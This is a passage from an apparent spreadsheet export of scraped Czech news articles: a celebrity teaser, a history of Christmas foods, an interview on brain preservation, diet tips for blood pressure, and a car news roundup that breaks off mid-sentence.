    <t>Michal Suchánek své dceři Berenice herectví rozmlouval, ale dnes ji v něm plně podporuje Když kdysi Berenika Suchánková (27) doma rodičům sdělila, že z ní bude herečka, se slavným vtipálkem Michalem Suchánkem (59) to prý málem seklo. Moc dobře totiž věděl, jak je herecká práce těžká, a že se může klidně stát, že role zkrátka chodit nebudou. A to se také stalo… Na jedné straně herec a komik, na druhé straně muzikálová choreografka a tanečnice. Už když byla Berenika Suchánková (27) malá, věděla, že ji umělecká profese nemine. Odmalička krásně zpívala, tančila, stepovala a ze všeho nejraději rodičům přehrávala všemožné scénky. Zbývá vám 88 % článku k přečtení! Co se v článku dozvíte: Proč Michal Suchánek změnil názor? Co Bereniku přimělo veřejně prosit o pomoc? Jak se Michal Suchánek vyrovnává s obavami? Jaké výzvy čelila Berenika v herectví? Přístup k celému článku získáte s PREMIUM předplatným. (pokud nemáte předplatné) (pokud předplatné máte) Pokud vám stačí odemknout pouze tento článek, můžete tak učinit okamžitě zasláním jediné SMS. Zašlete SMS ve tvaru " ctu clanek " na číslo 903 33 20. Během chvilky obdržíte číselný kód, kterým článek odemknete. Cena SMS odeslané na číslo 9033320 je 20 Kč vč. DPH. Službu technicky zajišťuje Airtoy a.s. Infolinka: 602 777 555, www.platmobilem.cz Předchozí článek Už od čtyřiceti let Lipavský exceloval v rolích „mladých“ dědků Moje šťastná hvězda / 8.12.2024 Pelhřimov je nejen městem rekordů, ale také rodištěm jednoho z nejlepších komiků Lubomíra Lipského (†92). Tady prožíval idylické dětství a tady se také poprvé postavil na divadelní prkna. Tatínek Lubomíra Lipského (†92) vlastnil v Pelhřimově nejen vyhlášené pekařství, ale byl také vynikajícím místním ochotníkem, který vedl divadelní soubor Rieger. Lásku k herectví předal i svým třem synům, z nichž […] Zpívající bouřlivák Milan Drobný stále miluje ženy, víno , zpěv! Můj kousek štěstí / 8.12.2024 O umělecké dráze v dětství neuvažoval, bavil ho sport a hlavně hokej. Na konzervatoř se dostal vlastně náhodou, měl ale to štěstí, že tam potkal svého celoživotní přítele Karla Gotta . Velký milovník ženské krásy a věčný hledač lásky, takový je Milan Drobný (80), zpěvák, který krmil stránky časopisů i za minulého režimu svými milostnými avantýrami. Když se budoucí […] Ani rozvod Kolářovou a Ornesta nerozdělil Moje šťastná hvězda / 8.12.2024 To, co v případě Daniely Kolářové (78) a Jiřího Ornesta (†70) začalo jako studentská láska, přerostlo v osudový vztah. Tak silný, že nakonec přežil i velkou manželskou krizi a rozvod. Se svou životní láskou, hercem Jiřím Ornestem (†70), se Daniela Kolářová (78) potkala už během studií na DAMU . Byli sice hodně mladí, ale oba cítili, […] Vladimír Dlouhý si do života sahat nenechal! Staré dobré časy / 7.12.2024 Herecké povolání někdy připomíná smlouvu s ďáblem. Dlouho o tom mohl mluvit slavný Vladimír Dlouhý (52). Kdyby ovšem žil. Za slávu, přízeň krásných žen a obdiv fanoušků zaplatil nakonec tu nejvyšší cenu. Nic na tom nemění fakt, že on sám po herecké kariéře nikdy netoužil. Syn vrcholové sportovkyně, prvoligové házenkářky, a uznávaného inženýra – stavaře měl […]</t>
  </si>
  <si>
    <t>683000</t>
  </si>
  <si>
    <t>20241201_199_3475683991_f0cca6cb9eac44e8649a.html</t>
  </si>
  <si>
    <t>f0cca6cb9eac44e8649a</t>
  </si>
  <si>
    <t>Tajemství vánoční tabule. Jaký příběh skrývá smažený kapr, rybí polévka či bramborový salát?</t>
  </si>
  <si>
    <t>Tajemství vánoční tabule. Jaký příběh skrývá smažený kapr, rybí polévka či bramborový salát? Vánočka Vánočka má své kořeny hluboko ve středověku. Už ve 13. století byla součástí štědrovečerní hostiny, i když tehdy neměla dnešní podobu ani chuť. Pekl se bílý chléb známý jako calta, houska nebo štědrovka, která nesměla na slavnostním stole chybět. Tento chléb měl nejen sytit, ale byl také symbolickým nositelem štěstí, hojnosti a naděje na bohatou úrodu v příštím roce – to vše díky procesu kynutí, jenž byl považován za posvátný. ČTĚTE TAKÉ: Jsou vánoční stromky na náměstích bezpečné? V Litvínově se zřítil kvůli silnému větru Zpočátku se calty pekly ve veřejných pekárnách, což bylo běžné pro všechny slavnostní pečivo. Až kolem 18. století se jejich příprava přesunula do domácích kuchyní, kde se z pečení vánoček stala nejen povinnost, ale také tradice nesoucí rodinné poselství. Každá domácnost pekla tolik vánoček, kolik měla členů, a k tomu ještě jednu zvláštní, velkou, která se dávala doprostřed svátečního stolu. První vánočku dostal vždy hospodář. Tento zvyk měl přivolat úspěch a dobrou úrodu v příštím roce. Právě hospodář měl privilegium rozkrájet velkou vánočku a rozdělit ji mezi rodinu – a dokonce i mezi domácí zvířata, aby se jim dařilo. Vánočka však nebyla pouze rodinným pokrmem. Pekla se také jako dar – mezi sousedy, přáteli, ale i mezi chudými a bohatými. Posíláním vánoček si lidé projevovali štědrost a upevňovali dobré vztahy. Tento akt měl připomínat „dar z nebes“, tedy narození Ježíše Krista . Recept na tradiční máslovou vánočku naleznete zde. A pokud byste chtěli vyzkoušet něco nového, můžete vsadit na slanou škvarkovo-brynzovou vánočku podle Pavla Berkyho . Houbový kuba Houbový kuba je jedním z nejstarších tradičních českých pokrmů, jehož kořeny sahají až do pohanských dob. Staří Slované považovali houby za posvátnou surovinu, spojenou s přírodou a magií. Kuba , připravovaný z ječných krup a sušených hub, byl původně jídlem chudého lidu. V dobách hladomorů a válek poskytoval jednoduchý a výživný pokrm, který zasytí i zahřeje. Přestože houby byly oblíbené i mezi vyššími vrstvami, kuba zůstával nejčastěji součástí jídelníčku prostých lidí. Tradičně je jeho původ spojován s jižními Čechami , odkud se postupně rozšířil do celé země a stal se tradičním vánočním pokrmem. Podle tradice se totiž nesmí jíst na Štědrý den až do večera maso, aby lidé spatřili zlaté prasátko. Zkuste ho i vy! Rybí polévka I rybí polévka je neodmyslitelnou součástí Štědrého dne. Její historie sahá až do středověku, kdy byla oblíbeným postním jídlem. Ve středověkých kuchyních ji připravovali zejména z kapra, který byl v Čechách snadno dostupnou rybou. Její příprava byla skromná, což odpovídalo dobovému duchu půstu, ale přesto plná chuti díky kombinaci bylinek a zeleniny. V průběhu staletí se rybí polévka přenesla ze šlechtických hostin i do lidových domácností a stala se tradiční součástí vánočního menu. Její pevné místo na stolech je spojeno nejen s gastronomií, ale i s českou vánoční symbolikou, která propojuje rybu s křesťanskými tradicemi. Vyzkoušet můžete například tento recept. Kapr Kapr patří k tradičním symbolům českých Vánoc, avšak jeho cesta na štědrovečerní stůl byla překvapivě dlouhá. Ve středověku a raném novověku Vánoce provázelo množství chodů symbolizujících hojnost, které však často obsahovaly spíše prostá jídla jako zelnou polévku, houbového kubu, pučálku či vánočku. Ryba se objevovala na svátečním stole pouze symbolicky, například její tvar mělo pečivo. Až v 19. století se kapr obecný začal prosazovat v měšťanských domácnostech jako typické vánoční jídlo. Na venkově a mezi chudšími vrstvami se tento zvyk rozšířil až po První světové válce díky rostoucí dostupnosti kapra z velkochovů. Recepty na úpravu kapra se od dob Magdaleny Dobromily Rettigové příliš nezměnily. Smažený kapr v trojobalu, který dnes dominuje české štědrovečerní tabuli, si získal oblibu zejména po druhé světové válce, kdy smažená jídla odpovídala tehdejším kulinářským trendům. Recept na něj naleznete zde. Pokud si ale chcete Štědrý večer ozvláštnit, můžete vyzkoušet kapra na černém pivě podle Jana Punčocháře či kapra marinovaného v ryzlinku. Bramborový salát Ke kaprovi patří bramborový salát. Každá rodina má svůj vlastní osvědčený recept, často považovaný za nepřekonatelný. Variabilita tohoto pokrmu odráží jeho historii – od skromných začátků, kdy se připravoval pouze z dostupných ingrediencí, až po současné bohaté verze. Bramborový salát se stal v českých domácnostech oblíbeným ve 20. letech minulého století a jeho recept poprvé zaznamenala Marie Janků - Sandtnerová v roce 1924. Tehdejší salát se obešel bez majonézy a spojoval brambory, kořenovou zeleninu, vývar, ocet a olej. Díky své jednoduchosti a nízkým nákladům si jej mohly dovolit i chudší rodiny. Dnes je bramborový salát rozmanitější. Základ tvoří brambory a vařená zelenina, často doplněné vejci, cibulí, kyselými okurkami, případně salámem, a vše je spojeno majonézou nebo její zdravější variantou, jogurtem. Výsledná chuť závisí na poměrech jednotlivých surovin a kvalitě použitých přísad. Každý kraj, rodina i kuchař má své vlastní tajemství přípravy, které dělá jejich salát jedinečným. Vyzkoušejte recept Zdeňka Pohlreicha či Karla Gotta . Sladká tečka</t>
  </si>
  <si>
    <t>20241201_2_3479614172_e8519454cd5286fc8cf1.html</t>
  </si>
  <si>
    <t>e8519454cd5286fc8cf1</t>
  </si>
  <si>
    <t>„Zachováme-li si mozek, nemusí nikdo zemřít": seznamte se s neurovědcem, který věří, že život může být věčný</t>
  </si>
  <si>
    <t>„Zachováme-li si mozek, nemusí nikdo zemřít": seznamte se s neurovědcem, který věří, že život může být věčný „Zachováme-li si mozek, nemusí nikdo zemřít": seznamte se s neurovědcem, který věří, že život může být věčný 2. 12. 2024 čas čtení 16 minut Elizabeth Hughes Gossettová se neměla dožít více než 11 let, tedy věku, kdy se u ní objevila cukrovka prvního typu. Gossettová se narodila v Albany ve státě New York a její diagnóza byla stanovena v roce 1918, kdy ještě nebyla známa žádná léčba cukrovky. Délka jejího života byla jen otázkou několika měsíců. Její rodiče zoufale hledali jakýkoli způsob, jak udržet dceru naživu. Lékař z New Jersey přišel s radikálním řešením: udržovat nízkou hladinu cukru v krvi diabetických dětí tím, že jim bude podávat jen minimum potřebné k přežití. Tím se prognóza prodloužila o několik měsíců až let. Tito malí pacienti nebyli zrovna živí, ale žili. Na jaře roku 1919 se Gossettová vydala na tuto hladovou kliniku. Byla jí neustále zima a měla hlad. Vyhublá, neschopná pohybu ani růstu. V nejnižší fázi její váha klesla na 20 kg. O tři roky později se Gossettová potácela na prahu smrti, ale co je rozhodující, nepřešla na druhou stranu. „A díky tomu,“ vysvětluje doktor Ariel Zeleznikow-Johnston, “byla stále naživu, když se v roce 1921 podařilo to, co se do té doby zdálo nemožné: byla vyvinuta léčba inzulinem.“ Gossettová dostala první injekci hormonu v roce 1922 a začala znovu jíst, znovu se hýbat, znovu žít. Dožila se sedmdesátky a za tu dobu si píchla asi 42 000 inzulinových injekcí. „Víte,“ říká Zeleznikow-Johnston, “miliony let lidé na cukrovku prostě umírali, což se považovalo za nevyhnutelné. Nezměnitelné. Pak to najednou z ničeho nic přestalo být pravdou.“ V případě Gossettové nastalo období vakua: roky mezi její diagnózou a dostupností léčby. „V roce 1918 většina dětí s diagnózou cukrovky 1. typu umírala. Elizabeth ne, protože bylo stisknuto tlačítko pauzy a v důsledku toho pro ni byla vykoupena budoucnost. To je to, za co se zasazuji.“ Právě tato myšlenka je jádrem nové knihy Zeleznikow-Johnstona Budoucnost tě miluje: Jak a proč bychom měli zrušit smrt. Je to manifest - a doufá, že i plán -, jak dnešním nevyléčitelně nemocným a umírajícím lidem nabídnout tlačítko pauzy. Šanci zastavit své biologické hodiny, dokud věda a medicína dostatečně nepokročí. Možná i vyhlídku na nesmrtelnost. Je přesvědčen, že již existuje technologie, která to z velké části umožňuje a která stojí jen o málo víc než ojeté auto střední třídy. Jednatřicetiletý Zeleznikow-Johnston působí jako výzkumný pracovník na Monash University v Melbourne . Zajímá ho historie lékařského pokroku a to, kde leží budoucnost. „Logicky, kde můžeme očekávat, že tato technologie bude za 10, 20, 100 let. To mě přivedlo k perspektivě konzervace: jak bychom tu mohli být i za další desetiletí a staletí.“ Jinými slovy, mohli bychom si dát šanci využít vzdálené pokroky medicíny? „S příchodem konzervace mozku,“ píše, “si myslím, že vy nebo někdo, koho máte rádi, vůbec nemusíte umřít.“ Nejprve však mnohem jednodušší otázka: chtěli byste vůbec věčný život? Tato představa je natolik obskurní, že jste o ní pravděpodobně příliš nepřemýšleli. Ve svém oboru se s tímto tématem Zeleznikow-Johnston potýká pravidelně. „Vždycky jsem měl podezření, že naše společenské přijímání smrti vychází z neschopnosti představit si něco jiného.“ Vědecká literatura, jak zmiňuje, mu dává za pravdu. „Studie ukazují, že když se lidí napříč všemi věkovými kategoriemi zeptáte, jak dlouho by chtěli žít, většina z nich si řekne jen o pět až deset let déle, než je statisticky pravděpodobné: Řekněme, že 90 let.“ Zeleznikow-Johnston se domnívá, že to představuje neúplný obraz. Výzkum také ukazuje, že tyto odpovědi se změní, když se stanoví, že respondenti budou mít zaručeno dobré duševní a fyzické zdraví do dalších desetiletí. „Číslo okamžitě poskočí: 120 let, 150 let, déle. A existuje silná korelace mezi věkem člověka a tím, jak dlouho říká, že chce žít: čím je člověk starší, tím vzdálenější termín chce. Když děláte průzkum mezi nevyléčitelně nemocnými lidmi v hospicích a na smrtelné posteli, naprostá většina z nich má stále velmi silnou vůli žít. Řekl bych, že za většiny okolností by lidé chtěli žít déle, ale mají pocit, že to není možné.“ V podstatě s blížícím se konečným termínem naší smrti chce jen málo lidí skutečně zemřít. „Moderní medicína je ve skutečnosti praxí, která se snaží udržet smrt na uzdě. Ale ještě jsme si nepřipustili a neshodli se - jako společnost -, že konečným cílem lékařského výzkumu je vlastně úplná eliminace nemocí.“ „Na začátku roku 2000,“ říká, “odborníci prosazovali naléhavé debaty o schopnostech a bezpečnosti umělé inteligence. Neexistoval žádný časový plán, ale varovali před tím, co se blíží.“ Jejich prosby nebyly vyslyšeny. „Od roku 2012 došlo k explozi umělé inteligence. Širší společnost o ní nemluvila a nyní jsme nedostatečně vybaveni a připraveni.“ Zeleznikow-Johnston má podezření, že podobná revoluce v úmrtnosti se plíživě blíží i k nám. I když odmítnete zbytek toho, co obhajuje, říká, že na téma „porážka smrti: dobře, nebo špatně?“ bychom si měli udělat názor. Za předpokladu, že se rozhodneme pro to druhé, Zeleznikow-Johnston předpokládá, že by mohl mít plán. Než se pustíme do řešení praktických otázek prodloužení délky života, zamysleme se nad jeho základy, říká. „Teprve když pochopíme, co je to zemřít, můžeme uvažovat o tom, co znamená žít dál. Jistě,“ připouští, “kdyby někdo vyvinul lék proti stárnutí, který by proces stárnutí zastavil, nepotřeboval by širší diskusi.“ Prostě bychom žili stejně jako nyní, s vyhlídkou na nekonečně dlouhý život, pokud zůstaneme mimo nebezpečí. Ale to není tak docela vize Zeleznikow-Johnstona. Ta jeho je komplexní, s případným prospěchem ve vzdálené budoucnosti. Případně by nás viděl vzkříšené v nepoznatelné podobě. „Lidé předpokládají, že máme ostrou a jasnou představu o tom, co je to smrt,“ říká, “přitom tomu tak není: je to mnohem mlhavější.“ Ve své knize Budoucnost tě miluje Zeleznikow-Johnston nastiňuje, jak se hranice mezi životem a smrtí stírá. „Až do poloviny 20. století platilo, že pokud jste přestali dýchat a přestalo vám bít srdce, byli jste prohlášeni za mrtvé. Žádné další zásahy nebyly k dispozici.“ Situaci změnila technologie. „Vyvinuli jsme mechanické ventilátory, které nás udržují v dýchání; přístroje, které udržují krevní oběh, když se zastaví srdce.“ Dnes mohou přístroje pro podporu života fungovat jako plně umělé srdce a plíce. „Tyto pokroky nás posunuly k definici smrti založené na mozkové činnosti.“ V roce 1968 byla do klinické praxe zavedena mozková smrt: nevratné zastavení mozkových funkcí. Vědecký pokrok nyní opět naznačuje, že by to mohlo být neaktuální. „Vidíme, že malé kousky mozkových funkcí, jako je regulace tělesné teploty nebo funkce hormonů, mohou zůstat zachovány, i když by většina lékařů prohlásila někoho za mrtvého,“ říká. Inovace v medicíně budou stále častěji umožňovat umělou replikaci některých mozkových funkcí. „Protézy vracejí pacientům po poranění páteře kontrolu krevního tlaku. Po mrtvici nebo poškození mozku mohou implantáty umožnit lidem mluvit nebo používat končetiny. Zatím je to poměrně primitivní, ale budou se zlepšovat.“ Kde tedy uděláme hranici mezi životem a smrtí? Stále častěji, říká Zeleznikow-Johnston, se odborníci obracejí k identitě. „Možná, že skutečnou definicí smrti,“ říká, “je, když někdo trvale ztratí svou osobní identitu.“ Laicky řečeno, když naše jedinečné vědomí nadobro zmizí. „Nejdůležitější jsou oblasti mozku, jako je mozková kůra: domov osobnosti a dlouhodobé paměti.“ Stejně jako je souhrn naší genetické výbavy známý jako náš genom, naše identita se nachází v tom, co je označováno jako náš connectome; souhrn spojení mezi neurony v našem mozku. „Nemůže jít o fyzické věci v našem mozku,“ říká; buňky, které tvoří naši tělesnou hmotu, se v průběhu života neustále obnovují. Stejně jako jsou to slova vytištěná v knize, a nikoli konkrétní inkoust, který byl použit k jejich vytvoření, co dává jejím stránkám smysl, Zeleznikow-Johnston věří, že totéž platí i pro vás a pro mě. V tom spočívá jádro Zeleznikow-Johnstonovy teze. „Pokud je tomu tak, co můžeme udělat nyní, abychom tyto identity zachovali, když v současné době nemůžeme vyléčit něčí zdravotní problém, ale mohli bychom v budoucnu, jen kdybychom získali trochu času.“ Se současnou technologií, věří Zeleznikow-Johnston, je to již možné; a to i z vědeckého hlediska. Existují zřejmé příklady, kdy již stiskneme pauzu: spermie, vajíčka nebo embrya lze zmrazit ve stázi na desítky let, než se implantují. „Co si pravděpodobně uvědomujete méně,“ říká, “jsou další analogické chirurgické postupy, které se již používají. Někdy při operacích aneurysmat nebo poškození cév v okolí srdce nemohou lékaři jednoduše obejít cestu bypassy.“ Pokud má mít operace nějakou šanci na úspěch, je třeba průtok krve v těchto tělesech zastavit. Za normálních okolností by se to ukázalo jako smrtelné. Chirurgové však již desítky let obcházejí smrt pomocí techniky známé jako hluboká hypotermická zástava oběhu. „Je to v podstatě lékařská hypotermie,“ říká. „Když ochladíte tělo na teplotu kolem 20 °C, činnost srdce a mozku a krevní oběh se zcela zastaví.“ Pacient v podstatě vypadá jako mrtvý. Zákrok může trvat 30-40 minut. „Po opětovném zahřátí se pak pacientům jako zázrakem většinou vrátí vědomí s neporušenými kognitivními funkcemi.“ Po 60 minutách v tomto stavu se zvyšuje riziko poškození mozku. „Ale je to užitečný precedens: uvedení lidí do stáze by mohlo být možné, pokud se provede správně, pokud udržíme tyto psychologické vlastnosti uvnitř konektivity.“ Až do 20. století, pokud vám přestalo bít srdce, byli jste mrtv í Základní snahy o dosažení tohoto cíle začaly v polovině 60. let 20. století: Americký profesor psychologie James Bedford, první člověk, který byl zmrazen; kryonicky uchován. Do dnešního dne podstoupilo kryonický zákrok zhruba 600 lidí na celém světě. „Existuje dobrý důvod se domnívat, že techniky používané v předchozích desetiletích prostě nejsou dobré,“ tvrdí Zeleznikow-Johnston. „Zkuste rovnou zmrazit lidské tělo nebo mozek, ledové krystalky zničí tkáň. Byly vyzkoušeny složitější verze, přidání něčeho, co je zdánlivě nemrznoucí směs, ale ty vedly k těžké dehydrataci.“ Jednoduše řečeno, mozek se scvrkává. „Nikdo samozřejmě neprokázal obrácení tohoto procesu a takto konzervovaná mozková tkáň nevypadá pod mikroskopem dobře.“ Zeleznikow-Johnston nyní nabízí alternativní návrh: kryokonzervaci stabilizovanou aldehydem, známou také jako fixace. „V podstatě,“ říká, “zavedením chemických látek ve vhodnou chvíli, které zachovají strukturu něčího mozku, můžeme udržet jeho obvody a struktury.“ Po zmrazení v podstatě zachováme svou identitu na neurčito. „V laboratořích se tento proces fixace běžně používá při výzkumu na zvířatech. Byl vyvinut v roce 2015, nejedná se o složitý postup a byl testován na velkých zvířatech i na lidech, a to post mortem.“ Jak mi sdělil Zeleznikow-Johnston, dvě skupiny na západním pobřeží USA jsou na pokraji toho, aby tento postup nabídly veřejnosti. Další v Evropě . „Určitě to lze udělat už dnes,“ je přesvědčen, “a v příštím roce to bude dostupnější. Mohlo by se to rychle rozšířit, pokud by byla poptávka.“ V závěrečných kapitolách knihy vyčísluje hrubé náklady: při dnešních cenách by se za počáteční konzervační proceduru mělo zaplatit zhruba 13 000 dolarů. V případě, že se bude provádět ve velkém měřítku, dalších 1 300 dolarů ročně by mělo pokrýt průběžné skladování a související administrativní náklady. „Nejsem účetní,“ dodává, “ale je to můj nejlepší odhad.“ V porovnání s penězi, které si vyžádá řada lékařských zákroků - od léčby rakoviny až po transplantace - jde o drobné. Ale jak bychom nakonec mohli lidi vzkřísit, zůstává nejasné. K čemu je stisknutí pauzy bez tlačítka restartu? Tady, jak připouští, se pevně dostáváme na pole sci-fi. Zeleznikow-Johnston bez obav tvrdí, že významná pokroková řešení v oblasti nanomedicíny nabízejí jednu z cest; jinak existuje tzv. mind-uploading neboli emulace mysli - převedení člověka do digitální podoby. „Rozložíme-li tyto prvky, je to poměrně jednoduchá extrapolace z dnešní technologie,“ říká. „Vezmeme skeny struktury mozku s velmi vysokým rozlišením, abychom charakterizovali, jak fungují něčí neurony, vytvoříme je znovu v digitální podobě a pak je vložíme do jiného robotického, virtuálního nebo biologického těla.“ Budoucí vědci budou muset doplnit detaily. „Pokud se však vzpomínky a zážitky, které nás definují, udrží, člověk přežil. Tvrdím, že robotický nebo digitální mozek, pokud je proveden správně, je stále vámi.“ Kdyby zítra Zeleznikow-Johnston dostal diagnózu smrtelného onemocnění, nakonec by podstoupil zákrok uchování mozku. Povzbudil by přátele a rodinu, aby ho následovali. „Můj strach ze smrti se nezmírnil,“ říká. „Stále mě to děsí. To, co navrhuji, není žádné kouzlo, i kdyby se to podařilo.“ Nespočet proměnných by muselo dopadnout v náš prospěch: technologie vyvinutá a správně implementovaná. Jaderné válce a klimatické katastrofě se vyhnout. Nějaká budoucí generace se rozhodne nabídnout svým vzdáleným předkům další šanci na život. „I kdybych měl záruku, že se vrátí všichni, které mám rád, stejně by mi krátkodobě chyběli, ale poskytuje to určitou útěchu. Moje existenciální zoufalství z toho, že všichni, které mám rád, jednoho dne zmizí, sice úplně nezmizelo, ale nabízí to záblesk naděje.“ Stále nejste přesvědčeni? Stačí se podívat, nabádá, na anestezii. „Před polovinou 19. století, pokud jste potřebovali operaci, jste se prostě museli vyrovnat s bolestí. Ano, mohli jste si vzít nějaké bylinky, alkohol ; možná opiáty, pokud byly k dispozici.“ Mezi alternativy patřilo údajně škrcení, jinak zasazení knokautujícího úderu do hlavy pacienta. „Tak tomu bylo po celou historii lidstva, až do objevu anestezie. Byla to bezprecedentní změna. Člověk už nemusel trpět.“ V těchto tématech zdaleka nepanuje shoda: mnohé je neprobádaným územím. Podle nově zveřejněného průzkumu mezi 300 neurology 40 % z nich předpovídá, že zachování a obnovení mozku bude možné. Přesto je Zeleznikow-Johnston více než připraven na to, že celá jeho teze bude sestřelena. „Skeptici by měli vynaložit úsilí na důkladné prozkoumání a kritické zhodnocení mého návrhu,“ říká, “buď prokáží, že to, co prosazuji, nemůže fungovat - v tom případě se omluvím a opustím to - nebo si uvědomí, že to, co navrhuji, má smysl. Je načase vytvořit akademický konsenzus ohledně současné a blízké proveditelnosti zachování mozku.“ Jedno je však jisté: to, co bylo kdysi považováno za nemožné, se může v okamžiku stát další skutečností. Zdroj v angličtině ZDE Rubrika transition_slide Zahraničí</t>
  </si>
  <si>
    <t>9530</t>
  </si>
  <si>
    <t>7170</t>
  </si>
  <si>
    <t>20241201_20_3479073418_2eafa514d971733cc175.html</t>
  </si>
  <si>
    <t>2eafa514d971733cc175</t>
  </si>
  <si>
    <t>4 kroky, které vám sníží vysoký cholesterol. Aplikujte je a půjde dolů i vám</t>
  </si>
  <si>
    <t>4 kroky, které vám sníží vysoký cholesterol. Aplikujte je a půjde dolů i vám 4 kroky, které vám sníží vysoký cholesterol. Aplikujte je a půjde dolů i vám close tomwieden / Pixabay Renata Bachtíková 1. 12. 2024 clock 3 minuty Bojujete s vysokým krevním tlakem? Pak je na čase podívat se na svůj jídelníček a přehodnotit vaše stravovací návyky. Kontrolujte příjem soli a sledujte velikosti porcí, které během dne sníte. Kontrola stravy Zaměřte se na to, co jíte. Možná si ani neuvědomujete, kolik kalorií denně tělu dodáte. Podceňujete příjem jídla a divíte se tomu, že nemůžete zhubnout. Zapisujte si všechno, co během dne sníte, evidujte si velikosti porcí. Jen tak zjistíte, co všechno během dne sníte. Pak můžete začít upravovat porce a snižovat kalorie. Jen tak budete mít svůj tlak pod kontrolou. Pozor na sůl Strava s vysokým obsahem soli zvyšuje krevní tlak. Čím méně jí budete přijímat, tím snáze budete svůj tlak kontrolovat. Denní doporučená dávka soli je asi jedna čajová lžička. Vyhýbejte se zpracovaným a baleným potravinám. Místo soli používejte pro dochucování pokrmů bylinky a koření bez obsahu soli. Pozor dejte na uzeniny. Vyhýbejte se potravinám s vyšším obsahem sodíku. Pozor na to, co jíte S kontrolou krevního tlaku pomáhají draslík, hořčík a vláknina. Do jídelníčku zařaďte více ovoce a zeleniny, které tyto látky dodají. Navíc mají nízký obsah sodíku. Dobrým zdrojem hořčíku jsou také ořechy, různé druhy semínek, luštěniny nebo libové maso. Chcete-li zvýšit množství přirozeného draslíku, hořčíku a vlákniny, které přijímáte, zaměřte se na konzumaci ovoce (meruňky, banány, jablka, datle, hroznové víno , mango, pomeranče, mandarinky), zeleniny (brokolice, mrkev, zelené fazolky, rajčata, špenát), jogurtů nebo tuňáka. Vyzkoušejte DASH dietu Ta pomáhá snižovat vysoký krevní tlak. Obsahuje menší množství soli. Je bohatá na ovoce, zeleninu, celozrnné výrobky, rybí a drůbeží maso, ořechy, luštěniny a nízkotučné mléčné produkty. Tyto druhy potravin nabízejí vyšší obsah klíčových živin, mezi něž patří právě draslík, hořčík, vápník, vláknina a bílkoviny. Jak upravit jídelníček? Zelenina - 4-5 porcí denně – může být syrová, dušená, grilovaná i vařená. Ovoce – 4-5 porcí denně – čerstvé, mražené nebo sušené. Potraviny s nízkým obsahem tuků – 2-3 porce denně. Ořechy a semínka – 4-5 porcí týdně, můžete je zařadit jako zdravou a chutnou svačinku, přidejte je do cereálií nebo salátů. Zdravé tuky – 2-3 porce denně. Vysoký krevní tlak představuje hlavní rizikový faktor pro vznik mrtvice nebo různých srdečních chorob. Je tedy potřeba jej eliminovat. S tím vám pomůže právě vhodně zvolená strava. Zapomínat nesmíte ani na pravidelnou fyzickou aktivitu a kvalitní spánek. To jsou faktory, které pomáhají udržet váš krevní tlak v normě. Zdroje: Facebook X.com Threads Email Kopírovat Zavřít user facebook instagram youtube Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. vlm Copyright © VLTAVA LABE MEDIA a.s. všechna práva vyhrazena Publikování, šíření nebo jakékoliv jiné užití obsahu pro jiné než osobní účely uživatele, je bez písemného souhlasu VLTAVA LABE MEDIA a.s. zakázáno. Toto ustanovení platí také pro RSS kanály a jejich obsah. Přihlášení Rádi bychom znali důvod proč se nechcete přihlásit. Odběr newsletteru Chcete pravidelně dostávat výběr nejlepších článků na Váš e-mail? Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Skutečně se chcete odhlásit?</t>
  </si>
  <si>
    <t>41370</t>
  </si>
  <si>
    <t>20241201_200_3475671611_30c3325d98e0c29e3280.html</t>
  </si>
  <si>
    <t>30c3325d98e0c29e3280</t>
  </si>
  <si>
    <t>Týden v autech: Rakousko jako země, kde vydírají řidiče a designér Pininfariny v Česku</t>
  </si>
  <si>
    <t>Týden v autech: Rakousko jako země, kde vydírají řidiče a designér Pininfariny v Česku Tento týden jsme pokračovali v kauze nebezpečných parkovišť a narazili na jednu zvláštní benzinku Hypersport Pininfarina Battista za 55 milionů korun má své dealerství v Beskydech . Popovídali jsme si s jeho designérem. A byl to zážitek! Zdroj: Tiskový servis Pininfarina Čím hlouběji pronikáme do problému nebezpečných parkovišť v Rakousku , tím víc se nám zdá, že je náš jižní soused vyloženě nepřátelskou zemí k řidičům. A to nejen místním. Tento týden jsme zjistili, že vysoké pokuty zaplatíte za vjetí do zelených zón nebo za pouhé projetí čerpací stanicí ve Vídni . Našly se ale i pozitivní zprávy. Třeba příchod nové Audi Q5 Sportback nebo příjezd designéra vzácného hypersportu Pininfarina Battista , který se prodává v Čeladné . Nová auta 5.0 Audi představilo novou verzi Q5 Sportback. Má dravější vzhled a na šestiválec nezapomněla Číst článek #1: Nové Audi Q5 Sportback portback má tradičně svažující se záď od B sloupku, na kterou navazují výrazné line. Podtrhují tak sportovní charakter automobilu. Mezi nejvýraznější prvky patří boční prolis a také charakteristická maska Single frame. Zadní část auta přitom působí uhlazeně a dominuje jí světelný podpis táhnoucí se přes celou délku pátých dveří. Varianta SQ5 dostala navíc poměrně dost chromových ohraničení. Oproti standardnímu modelu má Sportback o něco menší kufr. Zavazadlový prostor nabízí 515 litrů, v případě verze SQ5 je to ještě o 50 litrů méně. I tak se jedná o poměrně solidní objem. V případě složení zadních sedaček je prostor navýšen až na 1415 litrů. Nová auta 5.0 V Česku se prodává italský hypersport za 55 milionů korun. Udělali jsme rozhovor s jeho designérem Prohlédnout galerii #2: Pininfarina Battista a jeho designér v Česku Česko je domovem mnoha automobilek. Své vozy zde vyrábí Škodovka, Toyota i Hyundai . Zároveň tu máme oficiální zastoupení luxusních značek Bentley, Lamborghini , Rolls-Royce nebo nově i Aston Martin . Nicméně na showroom Bugatti, Koenigsegg nebo Pagani u nás nenarazíte. Hypersporty se naší malé zemi vyhýbají, tedy až do teď. V srdci Beskyd vyrostla „nenápadná“ budova, ve které je možné si prohlédnout a objednat nejrychlejší hypersport světa - Pininfarina Battista . Jde o vůz, který má techniku z Rimacu Nevera a je oděný do exkluzivního kabátu z designérského studia Pininfarina . A kdo má toto umělecké dílo na čtyřech kolech na svědomí? Šéfdesignér Dave Amantea, se kterým jsme udělali exkluzivní rozhovor. Řidičův chleba 4.6 Pokuta 10 tisíc korun za pouhé projetí. Čerpací stanice trestá řidiče, kteří u ní nenatankují Číst článek #3: Vyděrači řidičů z Vídně V Rakousku se roztrhl pytel s pokutováním nic netušících řidičů. Stačí, aby se například jen otočili na prázdné nijak neoznačené ploše nebo zaparkovali na parkovišti déle, než je uvedeno na dodatkové tabuli, a hrozí jim i desetitisícové sankce. Trik je totiž v tom, že prázdné plochy či 